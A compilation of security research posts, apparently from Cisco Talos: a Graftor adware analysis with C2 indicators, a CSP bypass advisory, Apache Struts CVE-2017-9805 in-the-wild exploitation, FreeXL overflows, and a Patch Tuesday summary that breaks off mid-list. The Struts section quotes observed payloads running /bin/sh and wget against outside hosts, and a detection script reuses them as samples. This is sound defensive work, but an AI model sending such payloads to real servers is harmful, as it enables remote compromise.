The full decrypted file can be downloaded here. It contains the adware and other unwanted programs the Graftor downloader is supposed to install for its partners/customers. You can see an example in Fig. 31.

Fig. 31
The first URL from the 'l' key is used to download the partner executable and install it. The 'a' key is used as its command line parameters. We have yet to identify the exact meaning of all the keys; they are passed as parameters to a quite large JSON library, which is also statically compiled into the binary. Besides the JSON library we also found a statically compiled SQLite library; we haven't fully investigated how it is used by the executable. However, at this point we have enough information to detect and stop this adware downloader.
The information presented so far clearly shows the sophistication of this piece of software. With the data presented in the two decoded files, you have a good idea of the capabilities of the software and the impact it has on infected systems.
Graftor, and the applications that it downloads, also heavily check for AV products and use various techniques to detect if they are running in a sandbox environment. These are very similar to techniques commonly observed in malware.
Fig. 32a

Fig. 32b

Fig. 32c

Fig. 32d

Fig.32e

The software makes many excessive API calls, such as the following (Fig. 33), which have the effect of polluting sandbox analysis.
Fig. 33


Conclusion

Graftor continues to be one of the most notorious potentially-unwanted-software downloaders we see in the wild. Users may be unaware that it is being bundled and executed as part of the freeware installation, since these installation files silently execute Graftor alongside the freeware.
Once Graftor is running, it exfiltrates a huge amount of user and machine identifiable information and installs additional potentially-unwanted-applications from its partners. The downloader requests administrative rights on the local machine; with this access, it can do anything it wants to do on the user's machine.
Solutions such as AMP for Endpoints and AMP on network devices give administrators visibility of when software such as Graftor, and the further packages it downloads, is installed on devices. Similarly, network based detection can identify and block the CnC activity (Snort SID 44214). Thought should be given to blocking access to freeware websites to prevent the download of the Graftor installer. However, much freeware does not come bundled with Graftor and may be of great use to some users.
At the end of the day, keep in mind that if the software is free, you might be the product. Anyone using freeware should closely review the EULA before installing it. We know it is painful, but trying to remove this kind of software is likely more painful.

Coverage


Additional ways our customers can detect and block this threat are listed below.

Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

The Network Security protection of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.


IOC

Alternate Data Streams(ADS):

Hashes:

URLs:  
Command and Control Server GET Request:
hxxp://kskmasdqsjuzom[.]regularfood[.]gdn/J/ZGF0YV9maWxlcz0yMyZ0eXBlPXN0YXRpYyZuYW1lPVRlbXAlNUMyMjYzMzg3NjYxLmV4ZSZybmQ9ZTY5NjM5ZjJjYTdlNWNiNDU2ZmYwMDUyN2M2ODBlNDMxMTY0YmFhZGJlZWI3MTI5YjIwZGYzM2M3YzIzNTc1YQ...

Set-Cookie: GSID=3746aecf3b94384b9de720158c4e7d88; expires=Sat, 12-Aug-2017 15

Command and Control Server POST Request
hxxp://kskmasdqsjuzom[.]regularfood[.]gdn/J/ZGF0YV9maWxlcz0yMyZ0eXBlPXN0YXRpYyZuYW1lPVRlbXAlNUMyMjYzMzg3NjYxLmV4ZSZybmQ9ZTY5NjM5ZjJjYTdlNWNiNDU2ZmYwMDUyN2M2ODBlNDMxMTY0YmFhZGJlZWI3MTI5YjIwZGYzM2M3YzIzNTc1YSZkZWxheT0zODk...

Set-Cookie: GSID=3746aecf3b94384b9de720158c4e7d88; expires=Sat, 12-Aug-2017 15

Domains from sandbox run:

Snort Rules:
SID 44214


Vulnerability Spotlight: Content Security Policy bypass in Microsoft Edge, Google Chrome and Apple Safari

The vulnerabilities were discovered by Nicolai Grødum of Cisco.

Today, Talos is releasing details of vulnerabilities discovered in the Microsoft Edge browser as well as older versions of Google Chrome (CVE-2017-5033) and browsers based on WebKit such as Apple Safari (CVE-2017-2419). An attacker may be able to exploit the vulnerabilities and bypass the Content Security Policy set by the server, which may lead to disclosure of confidential information. Microsoft stated that this is by design and has declined to patch this issue.

Overview


One of the fundamental security mechanisms of a web application is the so called same-origin policy, prescribing which resources may be accessed by the application code. The essence of the same-origin policy is that it allows programmatic access to web resources only to the code that originates from the same server as the data that is being accessed.

For example, a script, executing within the context of a web browser, originating from the server good.example.com should be able to access data from the same server. On the other hand, a script originating from the server evil.example.com should not be able to access any data on good.example.com.

However, many vulnerabilities in web applications allowing the attacker to bypass the same-origin policy have been discovered. One particularly successful attack technique is Cross Site Scripting (XSS). XSS allows the attacker to inject remote code within the context of the original server code executing in the browser. To the browser, the injected code appears to originate from the same server as the legitimate application, therefore allowing access to local resources, which can lead to the leak of potentially confidential data to the attacker or even application session hijacking.

Content Security Policy (CSP) is a mechanism designed to prevent XSS attacks by whitelisting servers that may be used as legitimate sources for the client side web application code. Cisco researchers have found a way to bypass the Content Security Policy and allow attackers to exploit the issue and potentially disclose confidential data by injecting otherwise excluded code.

Technical details - Talos-2017-0306 (CVE-2017-2419, CVE-2017-5033)


CSP defines the Content-Security-Policy HTTP header that allows creation of a whitelist of sources and instructs the browser to only execute resources from the allowed sources specified by the policy. Even if an attacker finds a way to inject a malicious script and successfully launch an XSS attack by injecting a <script> tag with a remote script source, the remote source will not be matched by the list of allowed sources and will not be executed by the browser.

The Content-Security-Policy HTTP header defines the script-src directive which configures CSP for script code. For example, the line

Content-Security-Policy: script-src 'self' https://good.example.com

allows scripts to be loaded only from the server the browser is currently visiting and an additional server good.example.com.

However, an information disclosure vulnerability exists within Microsoft Edge (not patched as of version 40.15063), Google Chrome (patched) and Safari (patched). An attacker may be able to bypass the policy specified by the Content-Security-Policy header, causing an information leak.

There are three main components to an exploitation attempt: setting the Content-Security-Policy for the browser with "unsafe-inline" directive to allow for inline script code, then using window.open() to open a blank new window, and finally calling the document.write function to write code into the newly created blank window object in order to bypass CSP restrictions put on the document.

The issue, affecting the Microsoft Edge browser as well as older versions of Google Chrome and Firefox, is that the about:blank page has the same origin as its loading document but with the CSP restrictions removed, which allows for a successful exploitation.
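The bypass described above needs 'unsafe-inline' in the effective script policy. As an added example (not from the advisory or any browser's code), the following checks a Content-Security-Policy header value for that precondition, applying the CSP Level 2 rule that a nonce or hash source in the same directive makes 'unsafe-inline' ignored, and lists the external hosts the policy whitelists; the WEAK_POLICY string is constructed to contrast with the header from the post.

```python
import re

# Source expressions that make CSP Level 2+ browsers ignore 'unsafe-inline'
# in the same directive.
_NONCE_OR_HASH = re.compile(r"^'(nonce-|sha(256|384|512)-)", re.IGNORECASE)


def parse_csp(header: str) -> dict:
    """Parse a Content-Security-Policy header value into {directive: [sources]}."""
    policy = {}
    for directive in header.split(";"):
        tokens = directive.strip().split()
        if not tokens:
            continue
        name, sources = tokens[0].lower(), tokens[1:]
        # A repeated directive is ignored by browsers; the first one wins.
        policy.setdefault(name, sources)
    return policy


def script_sources(policy: dict):
    """script-src governs scripts; without it default-src applies; without both, anything goes."""
    if "script-src" in policy:
        return policy["script-src"]
    return policy.get("default-src")


def allows_inline_script(header: str) -> bool:
    """True if the policy lets inline script run, the precondition the post describes."""
    sources = script_sources(parse_csp(header))
    if sources is None:
        return True  # no script-src or default-src: scripts are not restricted at all
    if "'unsafe-inline'" not in (s.lower() for s in sources):
        return False
    # 'unsafe-inline' is neutralised by any nonce or hash source in the same directive
    return not any(_NONCE_OR_HASH.match(s) for s in sources)


def host_allowlist(header: str) -> list:
    """The external hosts a policy permits scripts from (the whitelist the post refers to)."""
    sources = script_sources(parse_csp(header)) or []
    return [s for s in sources if not s.startswith("'")]


# The header from the post next to a constructed variant carrying 'unsafe-inline'.
HARDENED_POLICY = "script-src 'self' https://good.example.com"
WEAK_POLICY = "script-src 'self' 'unsafe-inline' https://good.example.com"

if __name__ == "__main__":
    for label, header in (("hardened", HARDENED_POLICY), ("weak", WEAK_POLICY)):
        print(f"{label}: inline script allowed = {allows_inline_script(header)}, "
              f"hosts = {host_allowlist(header)}")
```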

More information about these vulnerabilities is available in the TALOS vulnerability report TALOS-2017-0306.

Discussion


Information disclosure vulnerabilities may not be as serious as the vulnerabilities allowing the attacker to launch remote code and escape the browser sandbox to access and control the system under attack.

However, XSS attacks that may allow an attacker to exfiltrate confidential data and even take over a user account are considered a serious issue. Content Security Policy is specifically designed with XSS attack prevention in mind and allows the server to whitelist resources that are trusted to be safely executed by a web browser.

Many developers rely on CSP to protect them from XSS and other information disclosure attacks and trust browsers to support the standard. However, it seems that the implementation of CSP within different web browsers differs, allowing attackers to write browser specific code to bypass the content security policy defining the source of the allowed code.

Users are recommended to use browsers with more complete support for the Content Security Policy mechanism as well as browsers that keep up to date with all newly discovered security vulnerabilities, including information disclosure vulnerabilities such as the ones described in this post.

Affected versions


Microsoft Edge (not patched as of version 40.15063)

Google Chrome prior to version 57.0.2987.98 - (CVE-2017-5033)

iOS prior to version 10.3 - (CVE-2017-2419)

Apple Safari prior to version 10.1 - (CVE-2017-2419)

Coverage


The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rule: 42112


Another Apache Struts Vulnerability Under Active Exploitation

This post authored by Nick Biasini with contributions from Alex Chiu.

Earlier this week, a critical vulnerability in Apache Struts was publicly disclosed in a security advisory. This new vulnerability, identified as CVE-2017-9805, manifests due to the way the REST plugin uses XStreamHandler with an instance of XStream for deserialization without any type filtering. As a result, a remote, unauthenticated attacker could achieve remote code execution on a host running a vulnerable version of Apache Struts.

This isn't the only vulnerability that has been recently identified in Apache Struts. Earlier this year, Talos responded to a zero-day vulnerability that was under active exploitation in the wild. Talos has observed exploitation activity targeting CVE-2017-9805 in a way that is similar to how CVE-2017-5638 was exploited back in March 2017.


Details

Immediately after the reports surfaced related to this exploit, Talos began researching how it operated and began work to develop coverage to prevent successful exploitation. This was achieved and we immediately began seeing active exploitation in the wild. Thus far, exploitation appears to be primarily scanning activity, with outbound requests that appear to be identifying systems that are potentially vulnerable. Below is a sample of the type of HTTP requests we have been observing.
<string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?vulnerablesite</string>
This would initiate a wget request that writes the contents of the HTTP response to /dev/null. This indicates it is purely scanning activity that identifies to the remote server which websites are potentially vulnerable to this attack, which is also a strong possibility since the compromised website is included in the URL. There was one other small variation that was conducting a similar request to the same website.
<string>/bin/sh</string><string>-c</string><string>wget -qO /dev/null http://wildkind[.]ru:8082/?`echo ...vulnerablesite...`</string>
During our research we found that the majority of the activity was trying to POST to the path of /struts2-rest-showcase/orders/3. Additionally most of the exploitation attempts are sending the data to wildkind[.]ru, with a decent amount of the requests originating from the IP address associated with wildkind[.]ru, 188.120.246[.]215.

Example of in the wild exploitation
Other exploitation attempts have been identified where Talos believes another threat actor appears to be exploiting the vulnerability for a different purpose. An example of the web requests found in the exploitation attempts can be found below.
<string>wget</string><string>hxxp://st2buzgajl.alifuzz[.]com/052</string>
Unfortunately, we were unable to retrieve the potentially malicious file that was being served at this particular location. If the previous Struts vulnerability is any indicator, the payloads could vary widely and encompass threats such as DDoS bots, spam bots, and various other malicious payloads.
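As an added example of turning the observations above into detection logic (not Talos's rule or any Struts code), the following scans request records for the two traits the post reports: POSTs to the struts2-rest-showcase orders path, and XStream `<string>` elements carrying shell or download commands. The request records, hostnames and scanner URL are constructed stand-ins, not the real indicators.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# XStream serialises a string array as a run of <string> elements, which is
# what the observed scanning requests contained.
STRING_ELEMENT = re.compile(r"<string>(.*?)</string>", re.DOTALL)
# Path most of the observed attempts targeted.
REST_SHOWCASE_PATH = re.compile(r"^/struts2-rest-showcase/orders/\d+")
# Tokens that mark a <string> element as a command rather than application data.
COMMAND_MARKERS = ("/bin/sh", "/bin/bash", "cmd.exe", "powershell", "wget", "curl")


@dataclass
class Finding:
    path: str
    severity: str
    reasons: List[str] = field(default_factory=list)
    commands: List[str] = field(default_factory=list)


def xstream_strings(body: str) -> List[str]:
    """Extract the values of every <string> element in a request body."""
    return STRING_ELEMENT.findall(body)


def assess_request(method: str, path: str, body: str) -> Optional[Finding]:
    """Return a Finding when a request matches the CVE-2017-9805 scanning pattern."""
    reasons = []
    commands = [s for s in xstream_strings(body)
                if any(marker in s for marker in COMMAND_MARKERS)]
    if method.upper() == "POST" and REST_SHOWCASE_PATH.match(path):
        reasons.append("POST to the struts2-rest-showcase orders path seen in the wild")
    if commands:
        reasons.append("XStream <string> elements carrying shell or download commands")
    if "`" in body or "$(" in body:
        reasons.append("shell command substitution in request body")
    if not reasons:
        return None
    # Commands in the body are the strong signal; the path alone only warrants a look.
    severity = "high" if commands else "low"
    return Finding(path=path, severity=severity, reasons=reasons, commands=commands)


def scan(records: List[Tuple[str, str, str]]) -> List[Finding]:
    """Run assess_request over (method, path, body) records, keeping only hits."""
    return [f for f in (assess_request(*r) for r in records) if f is not None]


# Constructed request records: two benign, two shaped like the observed scanning.
SAMPLE_REQUESTS = [
    ("GET", "/index.html", ""),
    ("POST", "/api/orders", "<order><id>3</id><item>book</item></order>"),
    ("POST", "/struts2-rest-showcase/orders/3",
     "<string>/bin/sh</string><string>-c</string>"
     "<string>wget -qO /dev/null http://scanner.example.invalid:8082/?vulnerablesite</string>"),
    ("POST", "/struts2-rest-showcase/orders/3",
     "<string>wget</string><string>http://dl.example.invalid/052</string>"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(f"[{finding.severity}] {finding.path}: {'; '.join(finding.reasons)}")
```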

IOCs

IP Addresses Observed:
Domains Contacted:
  • wildkind[.]ru
  • st2buzgajl.alifuzz[.]com
Commonly Used Path:
  • /struts2-rest-showcase/orders/3

Mitigation

Apache has released a new version of Struts that resolves this issue. If you believe that you have a potentially vulnerable version of Apache Struts there are two options: upgrade to Struts 2.5.13 / Struts 2.3.34, or remove the REST plugin if it's not actively being used. Instructions to achieve this are provided as part of the security bulletin and should be reviewed and tested before applying in a production environment. In the event it's not possible to upgrade or remove the REST plugin, limiting it to serving normal pages and JSON may help limit the risk of compromise.

Conclusion

This is the latest in a long line of vulnerabilities that are exposing servers to potential exploitation. In today's threat landscape a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. However, that does not imply that patching of servers should not be an extremely high priority. These types of systems, if compromised, can potentially expose critical data and systems to adversaries.

The vulnerability is yet another example of how quickly miscreants will move to take advantage of these types of issues. Within 48 hours of disclosure we were seeing activity exploiting the vulnerability. To their credit, the researchers disclosed the vulnerability responsibly and a patch was available before disclosure occurred. However, with money at stake, bad guys worked quickly to reverse engineer the issue and successfully develop exploit code to take advantage of it. In today's reality you no longer have weeks or months to respond to these types of vulnerabilities; it's now down to days or hours and every minute counts. Ensure you have protections in place or patches applied to help prevent your enterprise from being impacted.

Coverage

Talos has released the following Snort rule to address this vulnerability. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort Rule: 44315



Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

Vulnerability Spotlight: TALOS-2017-0430/0431: Multiple Vulnerabilities in FreeXL Library


Vulnerability discovered by Marcin Noga of Cisco Talos

Overview

Talos has discovered two remote code execution vulnerabilities in the FreeXL library. FreeXL is an open source C library to extract valid data from within an Excel (.xls) spreadsheet. Exploiting these vulnerabilities can potentially allow an attacker to execute arbitrary code on the victim's machine. If an attacker builds a specially crafted XLS (Excel) file and the victim opens it with an application using the FreeXL library, the attacker's code will be executed with the privileges of the local user.

Details

TALOS-2017-0430 / CVE-2017-2923
An exploitable heap-based buffer overflow vulnerability exists in the read_biff_next_record function of the FreeXL library. The vulnerability occurs when the Binary Interchange File Format (BIFF) record size is bigger than the workbook->record field in the read_biff_next_record function.
A specially crafted XLS file can cause a memory corruption resulting in remote code execution. An attacker who sends a malicious XLS file can use this to overwrite large parts of memory to crash the application or to execute arbitrary code by overwriting critical control flow structures. More information can be found in the full report.

TALOS-2017-0431 / CVE-2017-2924
Another exploitable heap-based buffer overflow vulnerability exists in the read_legacy_biff function of the FreeXL library. The buffer overflow occurs in the function when it parses the DIMENSION record filled with data from a malicious XLS file. To trigger the vulnerability the malicious XLS file needs to be in BIFF format. An attacker can use this to overwrite large parts of memory to crash the application or to execute arbitrary code by overwriting critical control flow structures. For further information, see the full report.

Coverage

The following Snort Rules will detect exploitation attempts of these vulnerabilities. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort rules: 44271-44272, 44273-44274

Microsoft Patch Tuesday - September 2017

Microsoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 81 new vulnerabilities with 27 of them rated critical, 52 rated important, and 2 rated moderate. These vulnerabilities impact Edge, Hyper-V, Internet Explorer, Office, Remote Desktop Protocol, Sharepoint, Windows Graphic Display Interface, Windows Kernel Mode Drivers, and more. In addition, Microsoft is also releasing an update for Adobe Flash Player embedded in Edge and Internet Explorer.

Note that the Bluetooth vulnerabilities known as "BlueBorne" that affected Windows have been patched in this latest release. For more information, please refer to CVE-2017-8628.

Vulnerabilities Rated Critical


The following vulnerabilities are rated "critical" by Microsoft:
The following briefly describes these vulnerabilities.

CVE-2017-8747, CVE-2017-8749 - Internet Explorer Memory Corruption Vulnerability


Two vulnerabilities have been identified in Internet Explorer that could result in remote code execution in the context of the current user. These vulnerabilities manifest due to improper handling of objects in memory when attempting to render a webpage. Both vulnerabilities could be exploited if, for example, a user visits a specially crafted webpage that exploits one of these flaws.

CVE-2017-8750 - Microsoft Browser Memory Corruption Vulnerability


A vulnerability has been identified in Edge and Internet Explorer that could result in remote code execution in the context of the current user. This vulnerability manifests due to improper handling of objects in memory when attempting to render a webpage. This vulnerability could be exploited if, for example, a user visits a specially crafted webpage that exploits this flaw.

Multiple CVEs - Microsoft Edge Memory Corruption Vulnerability


Multiple vulnerabilities have been identified in Microsoft Edge that could allow an attacker to execute arbitrary code on an affected host. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of these vulnerabilities would result in arbitrary code execution in the context of the current user. Users who visit a specially crafted web page under the control of the attacker could be exploited.

The following is a list of CVEs that reflect these vulnerabilities:
  • CVE-2017-8731
  • CVE-2017-8734
  • CVE-2017-8751
  • CVE-2017-8755
  • CVE-2017-8756
  • CVE-2017-11766

CVE-2017-8757 - Microsoft Edge Remote Code Execution Vulnerability


A vulnerability has been identified in Edge that could result in remote code execution in the context of the current user. This vulnerability manifests due to improper handling of objects in memory when attempting to render a webpage. This vulnerability could be exploited if, for example, a user visits a specially crafted webpage that exploits this flaw. Alternatively, an attacker could embed an ActiveX control marked "safe for initialization" within a Microsoft Office document that "hosts the browser rendering engine" and socially engineer the user to open the malicious document.

CVE-2017-8696 - Microsoft Graphics Component Remote Code Execution Vulnerability


A vulnerability has been identified in Windows Uniscribe that could allow an attacker to remotely execute arbitrary code on an affected host. This vulnerability manifests due to improper handling of objects in memory. Exploitation of this vulnerability could be achieved if a user navigates to a malicious web page or opens a malicious file designed to exploit this vulnerability. Successful exploitation would result in arbitrary code execution in the context of the current user.

CVE-2017-8728, CVE-2017-8737 - Microsoft PDF Remote Code Execution Vulnerability


Two vulnerabilities in the Microsoft Windows PDF library have been identified that could allow an attacker to execute arbitrary code on a targeted host. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of these vulnerabilities would result in arbitrary code execution in the context of the current user. Users who open a specially crafted PDF file or who visit a web page containing a specially crafted PDF could exploit these vulnerabilities.

CVE-2017-0161 - NetBIOS Remote Code Execution Vulnerability


A vulnerability in NetBT Session Services has been identified that could allow an attacker to execute arbitrary code on the targeted host remotely. This vulnerability manifests as a race condition "when NetBT fails to maintain certain sequencing requirements." An attacker who sends specially crafted NetBT Session Service packets to the targeted system could exploit this vulnerability and achieve remote code execution.

Multiple CVEs - Scripting Engine Memory Corruption Vulnerability


Multiple vulnerabilities have been identified in the Microsoft Browser JavaScript engine that could allow remote code execution to occur in the context of the current user. These vulnerabilities manifest due to improper handling of objects in memory, resulting in memory corruption. Exploitation of these vulnerabilities is achievable if a user visits a specially crafted web page that contains JavaScript designed to exploit one or more of these vulnerabilities.

The following is a list of CVEs that reflect these vulnerabilities:
  • CVE-2017-8649
  • CVE-2017-8660
  • CVE-2017-8729
  • CVE-2017-8738
  • CVE-2017-8740
  • CVE-2017-8741
  • CVE-2017-8748
  • CVE-2017-8752
  • CVE-2017-8753
  • CVE-2017-11764

CVE-2017-8682 - Win32k Graphics Remote Code Execution Vulnerability


A vulnerability in the Windows font library has been identified that could allow an attacker to execute arbitrary code on an affected host. This vulnerability manifests due to improper handling of embedded fonts. Successful exploitation of this vulnerability would result in arbitrary code execution in the context of the current user. For this vulnerability to be exploited, a user would need to either navigate to a specially crafted website or open a specially crafted document that is designed to exploit this flaw.

CVE-2017-8686 - Windows DHCP Server Remote Code Execution Vulnerability


A vulnerability has been identified in the Windows Server DHCP service where remote code execution could be achieved if exploited. This vulnerability manifests as a result of the service incorrectly handling DHCP packets. Successful exploitation could allow an attacker to remotely execute code on an affected host or create a denial of service condition. For this vulnerability to be exploited, an attacker would need to send a specially crafted packet to the DHCP server that is set to failover mode. If the server is not set to failover mode, the attack will not succeed.

CVE-2017-8676 - Windows GDI+ Information Disclosure Vulnerability


An information disclosure vulnerability has been identified in the Windows Graphics Device Interface+ (GDI+) that could allow an attacker to obtain potentially sensitive information about the affected host. This vulnerability manifests due to the Windows GDI+ component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.

Vulnerabilities Rated Important


The following vulnerabilities are rated "important" by Microsoft:


The following briefly describes these vulnerabilities.

CVE-2017-8759 - .NET Framework Remote Code Execution Vulnerability


A vulnerability has been identified in the Microsoft .NET Framework that could allow an attacker to execute arbitrary code on an affected device. This vulnerability manifests due to improperly handling untrusted input. Successful exploitation could result in an attacker being able to execute arbitrary code in the context of the current user. A user who opens a malicious document or application could be exploited and compromised via this vulnerability.

CVE-2017-9417 - Broadcom BCM43xx Remote Code Execution Vulnerability


A vulnerability has been identified in the Broadcom chipsets used in HoloLens that could allow an attacker to execute arbitrary code on an affected device. This vulnerability manifests due to improper handling of Wi-Fi packets. Successful exploitation of this vulnerability could result in an attacker being able to take full control of the device with administrator privileges.

CVE-2017-8746 - Device Guard Security Feature Bypass Vulnerability


A vulnerability has been identified in Device Guard that could allow an attacker to bypass a security control and inject malicious code into a Windows PowerShell session. This vulnerability manifests as a flaw in how the Device Guard Code Integrity policy is implemented. An attacker who has access to a local machine could inject malicious code into a script that is trusted by the Code Integrity policy. As a result, the injected code could run with the same trust level as the script, bypassing the Code Integrity policy control.

CVE-2017-8695 - Graphics Component Information Disclosure Vulnerability


An information disclosure vulnerability has been identified in Windows Uniscribe that could allow an attacker to obtain important system information. This information could then be used to further compromise a user's system via another vulnerability. Exploitation of this vulnerability could be achieved if a user opens a specially crafted document or visits a malicious web page that is designed to exploit this vulnerability.

CVE-2017-8704 - Hyper-V Denial of Service Vulnerability


A denial of service vulnerability has been identified in Microsoft Hyper-V that could cause the host machine to crash. This vulnerability manifests due to the host server improperly validating input from a privileged user within a guest operating system. An attacker who has privileged access in a guest operating system on the affected host and executes a specially crafted application could trigger this vulnerability.

Multiple CVEs - Hyper-V Information Disclosure Vulnerability


Multiple information disclosure vulnerabilities have been identified in Windows Hyper-V that could allow an attacker to access sensitive information on the Hyper-V host operating system. These vulnerabilities manifest due to Hyper-V improperly validating input from an authenticated user inside a guest operating system. An attacker who has access to a guest VM and executes a specially crafted application within the guest VM could exploit this vulnerability and obtain information on the Hyper-V host.

The following is a list of CVEs that reflect these vulnerabilities:
  • CVE-2017-8706
  • CVE-2017-8707
  • CVE-2017-8711
  • CVE-2017-8712
  • CVE-2017-8713

CVE-2017-8733 - Internet Explorer Spoofing Vulnerability


A spoofing vulnerability in Internet Explorer has been identified that could allow an attacker to trick the user into believing they were visiting a legitimate web site. This vulnerability manifests due to Internet Explorer incorrectly handling specific HTML content. A user who navigates to a specially crafted web page under the control of the attacker could be exploited. As a result, this malicious website could then be used to serve spoofed content to the user or to serve as part of an exploit chain designed to compromise the affected host.

CVE-2017-8628 - Microsoft Bluetooth Driver Spoofing Vulnerability


A spoofing vulnerability has been identified in Microsoft's implementation of the Bluetooth stack and has been disclosed as part of the "BlueBorne" series of vulnerabilities. This vulnerability could allow an attacker to perform a man-in-the-middle attack and force a user's device to "unknowingly route traffic through the attacker's computer." For this exploit to be possible, an attacker would need to be within physical proximity to the targeted device and the targeted device would need to have Bluetooth enabled. Note that if both of these conditions are satisfied, an attacker could "initiate a Bluetooth connection to the target computer without the user's knowledge."

CVE-2017-8736 - Microsoft Browser Information Disclosure Vulnerability


A vulnerability in Microsoft Edge and Internet Explorer has been identified that could allow an attacker to obtain information regarding the user's current session. This vulnerability manifests due to the browser improperly verifying parent domains in certain functionality. An attacker who socially engineers a user into visiting a specially crafted web page could exploit this flaw and obtain information that is specific to the parent domain.

CVE-2017-8597, CVE-2017-8648 - Microsoft Edge Information Disclosure Vulnerability


Multiple vulnerabilities in Microsoft Edge have been identified that could allow an attacker to discover sensitive information regarding the targeted system. These vulnerabilities manifest due to improper handling of objects in memory. Successful exploitation of these vulnerabilities could give an attacker the necessary information to further exploit additional vulnerabilities on the system.

CVE-2017-8643 - Microsoft Edge Information Disclosure Vulnerability


A vulnerability in Microsoft Edge has been identified that could permit the disclosure of potentially sensitive information. This vulnerability manifests due to Microsoft Edge improperly handling clipboard events. Exploitation of this vulnerability is achievable if an attacker socially engineers a user into opening a specially crafted web page that exploits this flaw. As long as this web page remains open, an attacker would be able to gain knowledge of clipboard activities.

CVE-2017-8754 - Microsoft Edge Security Feature Bypass Vulnerability


A vulnerability in Microsoft Edge has been identified that could allow an attacker to bypass the Content Security Policy (CSP) feature. This vulnerability manifests due to improperly validating certain specially crafted documents. Successful exploitation could allow an attacker to redirect users to a malicious web page. Users who visit a specially crafted web page under the control of the attacker could be exploited. Alternatively, users who visit a compromised web page or who get served a malicious advertisement an attacker has injected into an advertising network could be exploited.

CVE-2017-8724 - Microsoft Edge Spoofing Vulnerability


A vulnerability in Edge has been identified that could allow an attacker to spoof content on a targeted host. This vulnerability manifests due to improper parsing of HTTP content. Successful exploitation of this vulnerability would result in the user being redirected to a web site of the attacker's choosing. This web site could then spoof content or serve as part of an exploit chain whereby the user could be exploited via another vulnerability. Scenarios where a user could be attacked include email or instant message vectors where the user clicks on a malicious link, or the user navigates to a specially crafted web page under the control of the attacker.

CVE-2017-8758 - Microsoft Exchange Cross-Site Scripting Vulnerability


A cross-site scripting vulnerability in Microsoft Exchange has been identified that could allow an attacker to perform a content/script injection attack. This vulnerability manifests due to Exchange failing to properly handle web requests. An attacker who sends an intended victim a specially crafted email containing a malicious link could exploit this vulnerability and potentially trick the user into disclosing sensitive information.

CVE-2017-11761 - Microsoft Exchange Information Disclosure Vulnerability


A vulnerability in Microsoft Exchange has been identified that could allow an attacker to obtain information regarding the affected server's local network. This vulnerability manifests as an information disclosure flaw due to improper input sanitization. An attacker who includes specially crafted tags in a Calendar-related message and sends this to an affected Exchange server could exploit this flaw and enumerate internal hosts assigned an RFC 1918 IP address. This information could then be used as part of a larger attack.

Multiple CVEs - Microsoft Office Memory Corruption Vulnerability


Multiple vulnerabilities have been identified affecting Microsoft Office that could allow an attacker to execute arbitrary code on an affected system. These vulnerabilities manifest due to Office improperly handling objects in memory. A user who opens a maliciously crafted Office document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Office document.

The following is a list of CVEs that reflect these vulnerabilities:
  • CVE-2017-8630
  • CVE-2017-8631
  • CVE-2017-8632
  • CVE-2017-8744

CVE-2017-8725 - Microsoft Office Publisher Remote Code Execution


A vulnerability has been identified affecting Microsoft Office Publisher that could allow an attacker to execute arbitrary code on an affected system. This vulnerability manifests due to Publisher improperly handling objects in memory. A user who opens a maliciously crafted Publisher document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Publisher document.

CVE-2017-8567 - Microsoft Office Remote Code Execution


A vulnerability has been identified affecting Microsoft Office that could allow an attacker to execute arbitrary code on an affected system. This vulnerability manifests due to Office improperly handling objects in memory. A user who opens a maliciously crafted document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Office document. Note that Preview Pane is not an attack vector for this vulnerability.

CVE-2017-8745, CVE-2017-8629 - Microsoft SharePoint XSS Vulnerability


Two vulnerabilities in Microsoft SharePoint have been identified that could allow an attacker to execute a cross-site scripting (XSS) attack. These vulnerabilities manifest due to SharePoint Server improperly sanitizing specific web requests from a user. Successful exploitation of these flaws could allow an attacker to execute script in the context of the current user, read content that the attacker would not otherwise have permission to view, or execute actions on behalf of the affected user.

CVE-2017-8742, CVE-2017-8743 - PowerPoint Remote Code Execution Vulnerability


Two vulnerabilities have been identified affecting Microsoft Office Powerpoint that could allow an attacker to execute arbitrary code on an affected system. These vulnerabilities manifest due to Powerpoint improperly handling objects in memory. A user who opens a maliciously crafted Powerpoint document could be exploited, resulting in arbitrary code execution of the attacker's choice in the context of the current user. Scenarios where this could occur include email-based attacks, where the attacker sends the victim a message with a malicious attachment, or web-based attacks where the user downloads and opens a malicious Powerpoint document.

CVE-2017-8714 - Remote Desktop Virtual Host Remote Code Execution Vulnerability


